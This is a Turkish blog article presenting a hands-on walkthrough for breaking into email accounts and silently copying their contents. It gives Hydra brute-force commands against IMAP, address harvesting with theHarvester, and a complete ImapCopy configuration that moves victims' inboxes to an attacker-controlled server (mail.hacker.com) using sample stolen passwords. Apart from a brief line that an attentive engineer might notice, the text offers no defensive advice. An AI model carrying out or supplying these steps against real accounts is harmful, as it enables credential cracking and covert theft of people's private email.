Hydra ve ImapCopy

Saniyeler İçerisinde emailleriniz nasıl çalınır?

 

Bu yazımda sizlerle hackerların nasıl email hesap şifrelerini kırdıklarından ve içerisindeki mailleri siz fark etmeden nasıl saniyeler içinde istedikleri bir adrese aktarabildiklerinden bahsedeceğim. Konunun anlaşılabilir olması açısından öncelikle yüzeysel bilgi verip tools isimlerinden bahsedeceğim, sonrasında örnek bir senaryoyu canlandıracağım.

 

 

Email adreslerinin şifresinin çalınması ve emaillerinin yedeklenmesi işlemi 2 adımdan oluşmakta,

 

1-Email adresi şifresinin kırılması

2-Emaillerin kopyalanması.

 

1- Email şifresini kırmak

 

Bu işlem için genellikle brute force ataklar kullanılır, basit şifre kullanan email adresi dakikalar içerisinde ele geçirilebilir ve bunlar olurken email adres sahibi kesinlikle bunlardan haberdar olmaz.

 

Ancak dikkatli bir sistem mühendisi bu durumu fark edebilir ve önlem almayı deneyebilir.

 

Brute force için kullanılan bazı toolslar : Hydra, Medusa, Ncrack.

 

Ben bu makale de brute force tools olarak hyrda kullanacağım.

 

2-Emaillerin kopyalanması

 

Bu işlem için genellikle imap sync işlemi yapan toolslar kullanılır, internet bağlantısı, kullanılan mail sunucuların internet bağlantısı ve servis yoğunluğuna bağlı olarak mailler saniyeler içerisinde farklı bir email adresinin inbox folderına kopyalanabilir. Bu işlem esnasında son kullanıcı ve sistem yöneticilerinin olayı fark edebilmeleri neredeyse imkânsızdır.

 

Bu işlem için ben ubuntu debian gibi işletim sistemlerindeki imapcopy tools kullanıyorum, farklı seçenekler de mevcut internette imap copy, imap sync şeklinde aramalar ile bu toollara erişebilirsiniz.

 

3- Uygulamalı Örnek

 

a) Toolsların hazırlanması

 

Kullanacak olduğumuz iki tools var,

 

* Hydra (Brute Force için)

* ImapCopy (Emailleri farklı bir adresin inbox folderına taşımak için)

 

Backtrack kullanıcıları için hydra default olarak kurulu geliyor, ubuntu, debian v.b. Işletim sistemlerinde

 

                apt-get install hydra

 

Şeklinde uygulamayı kurabilirsiniz.

 

Kurulum tamamlandıktan sonra komut satırında hydra yazarak hydra programı ile ilgili ek parametrelere erişebilirsiniz, hydra pop3 imap gibi mail servisleri dışında rdp, ssh v.b. Gibi servisler için de brute force yapabilmektedir.

 

image001

 

a) Hydra

Tek bir email adresini hedef alan saldırı;

 

                hydra -l user@xxx.com -P Passwordlist.txt mail.xxx.com  imap

 

Kurumlara gerçekleştirilern saldırlarda Theharvester gibi toolslar ile alan adına ait mailler search edilir,

 

                ./theHarvester.py -d xxx.com -l 500 -b Google

 

Theharvester ile ilgili detaylı bilgiye için http://www.securistan.com/theharvester-kullanimi/ adresini ziyaret edebilirsiniz.

 

Theharvester ile elde etmiş olduğunuz email adreslerini email.txt adı ile bir txt e yazın ve aşağıdaki hydra komutunu kullanın,

 

                hydra -L email.txt -P Passwordlist.txt mail.xxx.com  imap

 

Passwordlist.txt içerisinde password listiniz olmalıdır.

 

Bu adımda user1@xxx.com ve user2@xxx.com email adresi şifresi elde ettiğimizi düşünerek ikinci bölüme geçiyorum.

 

b) ImapCopy

 

Imapcopy uygulamasını ubuntu debian gibi linux sürümlerinde,

 

                apt-get install imapcopy

 

komutu ile kurabilirsiniz.

 

Kurulumun tamamlandıktan sonra

 

                cd /usr/share/doc/imapcopy/examples/

 

komutu ile /usr/share/doc/imapcopy/examples/ dizinine gidiyoruz, Bu dizinde ImapCopy.cfg adın da bir text doküman mevcut, bunu editlememiz gerekecek, editlenecek alanlar,

 

SourceServer    : Saldırılan alan adı mail sunucunun ip adresi

 

DestServer         : Emaillerin kopyalancağı sunucu

 

Copy                     : User ve şifre bilgileri

 

Bu bölümler deki değişikliği yapyıktan sonra komut satırında,

 

                İmapcopy

 

komutunu çalıştırıyoruz ve mailleri kendi email adresimize almaya başlıyoruz.

 

SourceServer    : mail.xxx.com

 

DestServer         : mail.hacker.com

 

Copy     : “user1@xxx.com”        “123456”                             “hacker@hacker.com”                 “!’^+.RQ5%+”

#                Email adres                     Email Password                Hacker email                                     Hacker Password

 

 

NOT : Yukaırdaki email adres, email password, hacker email,  hacker password alanları açıklamadır.

 

 

Bu işlemin ardından hacker@hacker.com adresine baktığınızda user1@xxx.com ve user2@xxx.com a ait mailleri görebilirsiniz.

 

ImapCopy.cfg dosyası sadece inbox klasörünü taşıyacak şekilde configure edilmiştir, diğer folderlar için ImapCopy.cfg dosyasında değişiklik yapmanız gerekir.

 

 

Örnek ImapCopy.cfg dosya içeriği aşağıdaki gibidir.

 

 

##############

# Sourceserver

##############

SourceServer mail.xxx.com

SourcePort 143

 

###################

# Destinationserver

###################

DestServer mail.hacker.com

DestPort 143

 

 

# DebugSrc and DebugDest will show all traffic between IMAPCopy and Server

#

#DebugSrc

#DebugDst

 

 

#skipfolder INBOX.Trash

#skipfolder INBOX.Sent

#skipfolder “INBOX.Sent Objects”

 

 

copyfolder INBOX

#copyfolder “INBOX.My personal files”

#copyfolder INBOX.Net-Connection.dy

#copyfolder INBOX.test

 

 

#DstRootFolder “Your old Mails”

 

 

#AllowFlags “\Seen\Answered\Flagged\Deleted\Draft Junk NonJunk $MDNSent $Forwared”

DenyFlags “\Recent”

 

 

converttimezone “UTC” “+0000”

converttimezone “UT”  “+0000”

 

 

#############################

# List of users and passwords

#############################

#             SourceUser                       SourcePassword             DestinationUser                              DestinationPassword

Copy    “user1@xxx.com”         “123456”                “hacker@hacker.com”                 “!’^+.RQ5%+”

Copy    “user2@xxx.com”         “istanbul”              “hacker@hacker.com”                 “!’^+.RQ5%+”

 

Makalemin sonuna geldim. Umarım faydalı bir makale olmuştur. Bir sonraki makalemde görüşmek üzere.

 

 

Exit mobile version